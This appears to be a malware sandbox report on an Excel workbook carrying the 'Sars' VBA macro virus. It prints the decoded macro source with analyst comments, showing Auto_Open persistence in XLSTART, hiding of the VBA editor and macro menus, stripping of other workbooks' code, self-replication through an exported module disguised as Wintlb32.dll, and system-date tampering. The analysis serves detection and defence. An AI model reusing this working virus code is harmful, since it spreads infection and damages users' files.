MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Xls.Trojan.Acute-1. Static analysis revealed the presence of VBA macros, specifically an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The macro code itself appears to be designed to download and execute a secondary payload, although the exact details are truncated; note that the portion of the extracted source visible in the preview below contains no explicit download routine — what is visible is self-replication (a copy saved as Sars.xls into Excel's startup folder, the module exported to Wintlb32.dll and re-imported) together with tampering with the Excel UI to hide the macro. The document body contains seemingly legitimate business terms, likely serving as a lure.
Heuristics 3
-
ClamAV: Xls.Trojan.Acute-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Trojan.Acute-1
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Auto_Open macro — high — OLE_VBA_AUTO: Auto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4927 bytes |
| SHA-256: 540ce8cdb5bf4bc114f226e8736c5a7a65bce9872c31bf96e7298412721348e1 | | | |
Preview script — first 1,000 lines of the extracted script (the listing below is truncated; routines referenced by name but not shown are outside the preview)
Attribute VB_Name = "ThisWorkbook"
' olevba concatenates every VBA stream of the document; this first header
' belongs to the workbook's own document module. Only exporter attributes are
' present here — no executable code is visible for this module.
' VB_Base: base-class GUID (presumably the Excel Workbook class — verify).
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
' Header of the single worksheet's document module; again attributes only,
' no code visible. Both document modules being empty is consistent with the
' CkAgain routine below, which wipes the code of every document module.
' VB_Base: base-class GUID (presumably the Excel Worksheet class — verify).
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sars"
' "Sars": the standard module that carries all of the visible logic. The
' constants below are referenced by CkAgain and Auto_Open; no Option Explicit
' is declared, so undeclared names used later are implicit Variants.
' Original author comments follow (kept verbatim for attribution value).
' Sars virus!
' Bandung, Indonesian
' Tonk sok Sars nyieunan macro, lah...
' (The line above appears to be Sundanese; approximate English: "Don't go
' making a Sars macro, eh..." — translation uncertain.)
'
' Module name used to recognise the virus's own component.
Public Const Micro = "Sars"
' Filename of the persisted copy, i.e. "Sars.xls".
Public Const Data0 = Micro & ".xls"
' Fake error text; not referenced in the visible portion of the listing —
' presumably shown by a routine that is truncated (e.g. Cr). The typo
' "intialize" is part of the original string and can serve as a static indicator.
Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly."
' Strips VBA from every open workbook except the module named Micro ("Sars"):
' non-document components with any other name are removed, and the code of
' document modules (ThisWorkbook / sheet modules) is deleted. Part of the
' self-replication logic; also called from Auto_Open. The names j, boom and
' bck are undeclared (no Option Explicit) and become implicit Variants.
' Static indicators for detection: VBProject.VBComponents.Remove and
' CodeModule.DeleteLines over all open workbooks.
Sub CkAgain()
Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14"
' The Attribute line above is exporter-emitted procedure metadata (Excel
' "Macro Options" data), not logic.
Dim bg As Object
Dim po As Object
' po is declared but never used in this routine.
' Every failure below (e.g. VBProject access being blocked) is silently ignored.
On Error Resume Next
For Each j In Workbooks
Set bg = Workbooks(j.Name)
For Each boom In bg.VBProject.VBComponents
' Type 100 is vbext_ct_Document (ThisWorkbook / sheet modules).
If boom.Type <> 100 Then
If boom.Name <> Micro Then
' Any standard/class/form module that is not the virus module is removed.
bg.VBProject.VBComponents.Remove boom
End If
Else
Set bck = boom.codemodule
' Document modules are not removed; their code is deleted instead.
If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
End If
Next boom
Next j
End Sub
' Entry point: Excel runs a procedure named Auto_Open automatically when the
' workbook is opened with macros enabled. Visible behaviour, in order:
'   1. cosmetic title-bar change and a date-triggered payload (20th of month);
'   2. persistence — a copy named Sars.xls is saved into Excel's startup folder;
'   3. anti-analysis — shortcut keys and menu items that would reveal the macro
'      are redirected or removed, and the persisted copy's window is hidden;
'   4. replication — all other VBA is stripped from the active workbook and the
'      Sars module is copied into it via an exported file named Wintlb32.dll.
' Everything runs under On Error Resume Next, so any step may fail silently.
' KillStart and the procedures referenced by name (Sars.SarsWordArt, Sars.Cr)
' are outside the visible (truncated) listing. The loop variable boom is
' undeclared (no Option Explicit) and becomes an implicit Variant.
' Static indicators for detection: SaveAs into Application.StartupPath,
' VBComponents.Export/Import of a file with a .dll extension, OnKey and
' CommandBars tampering, EnableCancelKey = xlDisabled, and the Date statement.
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
' The Attribute line above is exporter-emitted procedure metadata, not logic.
Dim Ct As Object
Dim bg As Object
Dim bgc As Object
Dim bck As Object
Dim xlsz As Object
Dim Ck As Boolean
' bgc is declared but never used here. Ck defaults to False.
On Error Resume Next
' Defined outside the visible listing; its purpose cannot be confirmed from here.
KillStart
With Application
' Cosmetic: the Excel title bar alternates by weekday parity.
If WeekDay(Now) Mod 2 = 0 Then
.Caption = "Sars is different on every computer system."
Else
.Caption = "Microsoft Excel for Buggie!"
End If
' Ensures an Xlstart folder exists under the Excel program directory (.Path);
' note the actual copy below is written to .StartupPath, not to this folder.
If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart"
' Payload on the 20th of the month: a message box (48 = vbExclamation icon,
' title "Sars") and then the Date statement advances the system date by one day.
If Day(Date) = 20 Then
MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro
Date = Now + 1
End If
.ScreenUpdating = False
' xlDisabled: Ctrl+Break cannot interrupt the running macro.
.EnableCancelKey = xlDisabled
' On even-numbered days, schedules Sars.SarsWordArt (not in the visible
' listing) to run 30 minutes from now.
If Day(Date) Mod 2 = 0 Then
.OnTime Now + TimeValue("00:30:00"), "Sars.SarsWordArt"
End If
' Persistence: a copy of the workbook is saved as Sars.xls into Excel's startup
' folder (XLSTART); workbooks there are opened automatically whenever Excel
' starts, which re-runs this Auto_Open.
If Dir(.StartupPath & "\" & Data0) = "" Then
ActiveWorkbook.SaveAs .StartupPath & "\" & Data0
End If
' If the only open workbook is the persisted copy, a fresh workbook captioned
' "Book1" is added so the user sees a normal-looking Excel session.
If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then
Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1"
End If
' bg is whichever workbook is active now (the new "Book1" if one was just added).
Set bg = ActiveWorkbook
' Anti-analysis: Alt+F12, Alt+F8 (Macros dialog) and Alt+F11 (VBA editor) are
' redirected to Sars.Cr (truncated below) instead of their normal action.
.OnKey "%{F12}", "Sars.Cr"
.OnKey "%{F8}", "Sars.Cr"
.OnKey "%{F11}", "Sars.Cr"
' Disables Window > Unhide... (keeps the hidden Sars.xls window hidden) and
' deletes the Tools > Macro menu entry.
.CommandBars("Window").Controls("Unhide...").Enabled = False
.CommandBars("Tools").Controls("Macro").Delete
' Re-triggers auto_Open in the persisted copy whenever any sheet is activated.
.OnSheetActivate = "Sars.xls!auto_Open"
' Hides the window of the persisted copy.
Workbooks(Data0).Windows.Item(1).Visible = False
CkAgain
' Drops the virus module's source next to Excel as Wintlb32.dll; the .dll
' extension is a disguise — VBComponent.Export writes VBA source text.
If Dir(.Path & "\Wintlb32.dll") = "" Then
Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll"
End If
' Same module-stripping loop as CkAgain, applied to the active workbook only
' (Type 100 = vbext_ct_Document).
For Each boom In bg.VBProject.VBComponents
If boom.Type <> 100 Then
If boom.Name <> Micro Then
bg.VBProject.VBComponents.Remove boom
End If
Else
Set bck = boom.codemodule
If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
End If
Next boom
' Checks whether the active workbook already carries the Sars module.
For Each xlsz In bg.VBProject.VBComponents
If xlsz.Name = Micro Then Ck = True: Exit For
Next xlsz
' Infection step: imports the module from the dropped file, deletes the file,
' saves the persisted copy, and saves the active workbook if it already has a
' path on disk (FullName containing a backslash).
If Ck = False Then
Set Ct = bg.VBProject.VBComponents
Ct.Import .Path & "\Wintlb32.dll"
Kill .Path & "\Wintlb32.dll"
Workbooks(Data0).Save
If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save
End If
End With
End Sub
Sub Cr():
... (truncated)